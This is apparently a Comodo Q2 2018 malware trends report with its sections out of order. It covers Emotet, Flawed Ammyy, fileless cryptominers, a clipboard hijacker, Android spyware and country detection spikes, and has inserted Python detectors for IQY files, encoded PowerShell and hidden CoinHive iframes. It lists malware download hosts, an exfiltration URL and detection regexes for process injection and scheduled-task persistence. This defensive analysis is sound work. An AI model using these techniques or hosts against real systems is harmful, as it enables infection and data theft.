This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania, Europe. Tel: +40 332 806 772

Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.

The special option to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY

At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, “lanesviewer”, to ensure persistence.

The malware creates the “lanesviewer” service to ensure persistence


After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers with popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus, every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is that this trick is also based on using legitimate software, this time from Microsoft.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY file contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell
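As an added, defender-side example (not part of the Comodo report), the following Python triage reads an IQY attachment the way Excel does, pulling out the WEB header, the URL Excel will fetch and the key=value settings, and records the traits that warrant holding the message: an external or bare-IP host, or a resource that is not a web page at all. The two sample files, the host names and the trusted-suffix list are constructed assumptions.

```python
"""Triage an Excel .iqy (Internet Query) attachment before anyone opens it.

An IQY file is plain text: a 'WEB' header line, a version line, the URL that
Excel will fetch when the file is opened, then optional key=value settings.
The URL is the part that matters, so the checks below focus on it.
Added example code; the two sample files and the trusted suffix are constructed.
"""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample: what a benign intranet query usually looks like.
BENIGN_IQY = """WEB
1
http://reports.intranet.example/q2/summary.html

Selection=AllTables
Formatting=None
"""

# Constructed sample: the shape the report describes, a query whose URL
# points at an external host that serves the next stage instead of a table.
SUSPICIOUS_IQY = """WEB
1
http://203.0.113.10/rnd/1.dat

Selection=1
Formatting=None
"""

# Assumption: hosts under this suffix are the only legitimate query targets.
TRUSTED_SUFFIXES = (".intranet.example",)
# Resource types a genuine web query normally pulls a table from.
WEB_QUERY_EXTENSIONS = (".htm", ".html", ".asp", ".aspx", ".php", "/")


@dataclass
class IqyReport:
    url: str
    host: str
    settings: Dict[str, str] = field(default_factory=dict)
    findings: List[str] = field(default_factory=list)


def parse_iqy(text: str) -> IqyReport:
    """Split an IQY file into its URL and settings; reject files without the WEB header."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an IQY file: missing WEB header or URL line")
    url = lines[2]
    settings: Dict[str, str] = {}
    for ln in lines[3:]:
        key, sep, value = ln.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    host = (urlparse(url).hostname or "").lower()
    return IqyReport(url=url, host=host, settings=settings)


def is_ip_literal(host: str) -> bool:
    """True when the host part is a raw IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage_iqy(text: str) -> IqyReport:
    """Parse the file and record every trait that warrants holding the attachment."""
    report = parse_iqy(text)
    parsed = urlparse(report.url)
    if parsed.scheme not in ("http", "https"):
        report.findings.append(f"unexpected scheme {parsed.scheme!r}")
    if not report.host.endswith(TRUSTED_SUFFIXES):
        report.findings.append(f"query targets external host {report.host!r}")
    if is_ip_literal(report.host):
        report.findings.append("host is a bare IP address")
    if not parsed.path.lower().endswith(WEB_QUERY_EXTENSIONS):
        report.findings.append(f"unusual resource {parsed.path!r} for a web query")
    return report


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_IQY), ("suspicious", SUSPICIOUS_IQY)):
        r = triage_iqy(sample)
        print(f"{name}: {r.url} -> {r.findings or 'no findings'}")
```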


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors to covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases, attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools with methods of protecting data built on defense-in-depth principles provides the most promising solution.

[Chart residue: data labels 43188, 46382, 48881; y-axis 40000 to 50000; x-axis Apr, May, Jun]


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: unlike other malware, cryptominers would not steal information or destroy data, but merely suck up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
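Decoding the argument is the first step a responder takes on a command line like this, so here is an added Python example (not Comodo's tooling) that does that and then scores the decoded script for the BadShell traits described above: a payload read back out of the Registry, Base64-decoded and injected into a running process, plus Task Scheduler persistence. The sample script, the command line built from it and the registry path are constructed placeholders, not material from the incident.

```python
"""Decode a PowerShell -EncodedCommand argument and score it for the traits
the BadShell incident showed: a payload read back out of the Registry,
decoded from Base64 and injected into a running process, with Task Scheduler
for persistence. Added example, not Comodo's tooling; the script and command
line below are constructed, and the registry path is a placeholder.
"""
import base64
import re
from typing import Dict, List, Optional

# Constructed stand-in for the decoded script: it only names the APIs a loader
# of this kind calls, which is what the indicator regexes key on.
SAMPLE_SCRIPT = r"""
$blob = (Get-ItemProperty -Path 'HKCU:\Software\Classes\PLACEHOLDER').Payload
$code = [Convert]::FromBase64String($blob)
# ... resolves VirtualAlloc / WriteProcessMemory / CreateRemoteThread and hands $code to a running process ...
schtasks /Create /SC MINUTE /MO 30 /TN "PLACEHOLDER" /TR "powershell.exe -NoP -W Hidden -enc ..."
"""


def encode_command(script: str) -> str:
    """PowerShell expects UTF-16LE text, Base64-encoded, after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line in the shape Task Scheduler would launch.
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + encode_command(SAMPLE_SCRIPT)

# Regexes run over the decoded script, grouped by the behaviour they suggest.
SCRIPT_INDICATORS: Dict[str, List[str]] = {
    "registry-stored payload": [r"Get-ItemProperty", r"HK(LM|CU):\\", r"Registry::"],
    "base64 decode": [r"FromBase64String"],
    "process injection": [r"VirtualAlloc", r"WriteProcessMemory", r"CreateRemoteThread"],
    "scheduled-task persistence": [r"\bschtasks\b", r"Register-ScheduledTask"],
    "kills other processes": [r"Stop-Process", r"\btaskkill\b"],
}
# Regexes run over the raw command line itself.
CMDLINE_INDICATORS: Dict[str, List[str]] = {
    "hidden window": [r"-w(?:indowstyle)?\s+hidden"],
    "profile bypass": [r"-nop(?:rofile)?\b"],
}

# Accepts the short forms PowerShell itself accepts: -e, -ec, -enc, -EncodedCommand.
ENCODED_ARG_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command(cmdline: str) -> Dict[str, object]:
    """Decode if needed, then collect which indicator groups fire and which regex hit."""
    script = decode_encoded_command(cmdline)
    hits: Dict[str, List[str]] = {}
    for name, patterns in CMDLINE_INDICATORS.items():
        found = [p for p in patterns if re.search(p, cmdline, re.IGNORECASE)]
        if found:
            hits[name] = found
    body = script if script is not None else cmdline
    for name, patterns in SCRIPT_INDICATORS.items():
        found = [p for p in patterns if re.search(p, body, re.IGNORECASE)]
        if found:
            hits[name] = found
    return {"encoded": script is not None, "script": body, "hits": hits, "score": len(hits)}


if __name__ == "__main__":
    result = triage_command(SAMPLE_CMDLINE)
    print("decoded script:", result["script"])
    for group, patterns in result["hits"].items():
        print(f"  [{group}] matched {patterns}")
    print("score:", result["score"])
```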

BadShell at work


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute “CriticalProcess”, meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware. If an “alien” cryptominer is detected, the feature will terminate its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an “AMDDriver64” process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2, these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this.

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive.

The link to CoinHive
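A page scanner that keeps up with this trick has to look through the Base64 layer rather than only at the visible HTML. The following Python is an added example (not Comodo code) that decodes string literals handed to atob()/eval()/document.write(), then flags any iframe that is 1x1 or points at the cnhv.co shortener, alongside the plain, undisguised form where the miner library is loaded by a <script> tag. Both HTML pages are constructed samples and the shortener path is a placeholder.

```python
"""Find the camouflaged CoinHive loader the report describes: a Base64 string
handed to atob()/eval()/document.write() that decodes to a 1x1 iframe whose src
is the cnhv.co URL shortener, which in turn loads the miner. The plain,
un-hidden form (a <script> tag pulling the miner library) is flagged too.
Added example, not Comodo code; both HTML pages below are constructed and the
shortener path is a placeholder.
"""
import base64
import binascii
import html
import re
from typing import Dict, List

SHORTENER_HOSTS = ("cnhv.co",)
MINER_HOSTS = ("coinhive.com", "coin-hive.com")

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']([^"']+)""", re.IGNORECASE)
# A Base64 literal passed straight into a decoder or writer call.
B64_ARG_RE = re.compile(r"""(?:atob|eval|document\.write)\s*\(\s*["']([A-Za-z0-9+/=]{16,})["']""")

# Constructed sample: the easily spotted form, the miner library loaded directly.
PLAIN_PAGE = '<html><body><script src="https://coinhive.com/lib/coinhive.min.js"></script></body></html>'

# Constructed sample: the Q2 form, a hidden iframe to the shortener wrapped in Base64.
_HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1" frameborder="0"></iframe>'
OBFUSCATED_PAGE = (
    '<html><body><script>document.write(atob("'
    + base64.b64encode(_HIDDEN_IFRAME.encode()).decode("ascii")
    + '"))</script></body></html>'
)


def decode_layers(page: str, max_depth: int = 3) -> List[str]:
    """Return the page plus every Base64 layer nested inside it, up to max_depth deep."""
    layers, frontier = [page], [page]
    for _ in range(max_depth):
        decoded_here: List[str] = []
        for text in frontier:
            for blob in B64_ARG_RE.findall(text):
                try:
                    decoded_here.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
                except (binascii.Error, ValueError):
                    continue  # not really Base64, or not text once decoded
        if not decoded_here:
            break
        layers.extend(decoded_here)
        frontier = decoded_here
    return layers


def find_miner_loaders(page: str) -> List[Dict[str, object]]:
    """List every iframe or script that points at the miner or its shortener, at any layer."""
    findings: List[Dict[str, object]] = []
    for layer in decode_layers(page):
        for tag in IFRAME_RE.findall(layer):
            attrs = {k.lower(): html.unescape(v) for k, v in ATTR_RE.findall(tag)}
            src = str(attrs.get("src", ""))
            # 1x1 (or 0x0) frames exist to be invisible, as the report notes.
            tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
            points_at_miner = any(h in src for h in SHORTENER_HOSTS + MINER_HOSTS)
            if points_at_miner or (tiny and src):
                findings.append({"kind": "iframe", "src": src, "hidden": tiny})
        for src in SCRIPT_SRC_RE.findall(layer):
            if any(h in src for h in MINER_HOSTS):
                findings.append({"kind": "script", "src": src, "hidden": False})
    return findings


if __name__ == "__main__":
    for label, page in (("plain", PLAIN_PAGE), ("obfuscated", OBFUSCATED_PAGE)):
        print(label, "->", find_miner_loaders(page))
```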


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.

The next malware in the series prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions.

[Figure: Disguises of KevDroid. Version-1: Naver Defender; Version-2: Netease Defender; Version-3: PU]

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts: id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the “AES” algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

[Figure: Disguises of Desert Scorpion. Version-1: Dardesh (Google Play Services, Instant Apps); Version-2: Settings]

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions.

[Figure: Disguises of Zoo Park. Version-1: Telegram Groups, انتخاب دھم; Version-2: Postrall, Yes For Referendum, انتخاب دھم; Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机; Version-4: VPN Easy, DroFirewall, m_android]

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named “Spymaster Pro” and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the application installed

Collect browserrsquos data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of previous versions, it includes some additional tricks:

Extracts photos, audio and video

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control over the Bluetooth Adapter

Extracts data about accounts, contacts details and installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version 1 to Version 3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

